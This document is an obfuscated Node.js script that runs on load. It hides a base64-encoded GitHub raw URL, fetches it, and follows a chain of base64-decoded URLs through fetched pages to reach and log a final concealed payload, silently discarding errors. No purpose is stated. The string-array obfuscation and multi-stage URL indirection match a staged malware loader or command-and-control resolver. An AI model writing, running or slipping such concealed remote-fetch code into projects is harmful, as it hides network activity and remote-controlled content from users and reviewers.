const _0x341cfe = _0x2acd;
function _0x2acd(_0x28aa2b, _0x130dcd) {
    const _0x30fc2a = _0x225a();
    return (
        (_0x2acd = function (_0x5ba90a, _0x25ab65) {
            _0x5ba90a = _0x5ba90a - (-0xba6 + 0x599 + -0x2 * -0x385);
            let _0x4ccf15 = _0x30fc2a[_0x5ba90a];
            return _0x4ccf15;
        }),
        _0x2acd(_0x28aa2b, _0x130dcd)
    );
}
function _0x225a() {
    const _0x1f7c8a = [
        "18356FNXOLJ",
        "log",
        "trim",
        "6057415sIwgER",
        "base-64",
        "load",
        "2375883ZAukXt",
        "9448LIIMuN",
        "6IYBcIz",
        "140aFqGLp",
        "EwOGRhcy50",
        "replace",
        "decode",
        "lkczA4ZnNk",
        "1742543pWdIyp",
        "get",
        "984CRrdmX",
        "eHQ=",
        "b3RkYy9tYW",
        "3079985UFzkOV",
        "Y29tL1JhcG",
        "13wdxBRb",
        "xocy9yYXJi",
        "body",
        "NXN4LmRzZn",
        "data",
        "aHVidXNlcm",
        "luL2RzYTk3",
        "axios",
        "9yYXcuZ2l0",
        "cheerio",
        "234884UmhBNR",
    ];
    _0x225a = function () {
        return _0x1f7c8a;
    };
    return _0x225a();
}
(function (_0x4a820a, _0x459295) {
    const _0x350851 = _0x2acd,
        _0x42f63e = _0x4a820a();
    while (!![]) {
        try {
            const _0x5801b2 =
                (parseInt(_0x350851("0x116")) / (-0x253a + -0x50e + 0x2a49)) * (parseInt(_0x350851("0x100")) / (0x214 + 0x34a * 0x1 + 0x2 * -0x2ae)) +
                (parseInt(_0x350851("0x111")) / (0x2378 + 0x1 * -0x8e2 + 0x1 * -0x1a93)) * (parseInt(_0x350851("0x101")) / (0x6bb + 0x1 * 0x2bd + -0x974)) +
                (-parseInt(_0x350851("0x114")) / (0x1 * 0xe44 + 0x16 * -0x1a5 + 0x15ef)) * (parseInt(_0x350851("0x109")) / (-0x193d + -0xa * -0xad + 0x1 * 0x1281)) +
                parseInt(_0x350851("0x104")) / (-0x1c8e + 0xf17 * -0x2 + 0x31 * 0x133) +
                parseInt(_0x350851("0x108")) / (0x5da + 0x1 * 0xcb5 + -0x1287) +
                -parseInt(_0x350851("0x107")) / (0xc5 * 0x3 + 0x1 * 0x22d4 + -0x251a * 0x1) +
                (parseInt(_0x350851("0x10a")) / (-0x1642 + -0x243f + 0x7 * 0x85d)) * (-parseInt(_0x350851("0x10f")) / (-0xcb * 0x14 + -0x19d * -0xb + -0x1d8));
            if (_0x5801b2 === _0x459295) break;
            else _0x42f63e["push"](_0x42f63e["shift"]());
        } catch (_0x38edd2) {
            _0x42f63e["push"](_0x42f63e["shift"]());
        }
    }
})(_0x225a, 0xc84bc + -0x90 * 0x2092 + 0x9028f * 0x2);
const ax5k = require(_0x341cfe("0xfd")),
    c4y7 = require(_0x341cfe("0xff")),
    b1s2 = require(_0x341cfe("0x105"));
async function r3j8() {
    const _0x10addc = _0x341cfe;
    try {
        const _0x25ab65 =
                "aHR0cHM6Ly" +
                _0x10addc("0xfe") +
                _0x10addc("0x11b") +
                "NvbnRlbnQu" +
                _0x10addc("0x115") +
                _0x10addc("0x117") +
                _0x10addc("0x113") +
                _0x10addc("0x11c") +
                _0x10addc("0x119") +
                _0x10addc("0x10e") +
                "MC5hc2Rkc2" +
                _0x10addc("0x10b") +
                _0x10addc("0x112"),
            _0x4ccf15 = b1s2[_0x10addc("0x10d")](_0x25ab65),
            _0x46d433 = await ax5k[_0x10addc("0x110")](_0x4ccf15),
            _0x362bd8 = _0x46d433[_0x10addc("0x11a")][_0x10addc("0x103")](),
            _0x2ed087 = b1s2[_0x10addc("0x10d")](_0x362bd8),
            _0x58779d = await ax5k[_0x10addc("0x110")](_0x2ed087),
            _0x4ef549 = c4y7[_0x10addc("0x106")](_0x58779d[_0x10addc("0x11a")]),
            _0xd52e34 = _0x4ef549(_0x10addc("0x118"))["text"]()[_0x10addc("0x10c")](/\s+/g, "")["trim"](),
            _0xb72ee = b1s2[_0x10addc("0x10d")](_0xd52e34),
            _0xeee7fd = _0xb72ee[_0x10addc("0x10c")](/\s+/g, "\x20")["trim"]();
        console["log"](_0xeee7fd);
        const _0x25d7e9 = await ax5k[_0x10addc("0x110")](_0xb72ee),
            _0x513da8 = c4y7[_0x10addc("0x106")](_0x25d7e9[_0x10addc("0x11a")]),
            _0x27d7b3 = _0x513da8("body")["text"]()[_0x10addc("0x10c")](/\s+/g, "")[_0x10addc("0x103")](),
            _0x4aa6ab = b1s2[_0x10addc("0x10d")](_0x27d7b3),
            _0x22efa7 = _0x4aa6ab[_0x10addc("0x10c")](/\s+/g, "\x20")[_0x10addc("0x103")]();
        console[_0x10addc("0x102")](_0x22efa7);
    } catch (_0x10f01d) {}
}
r3j8();
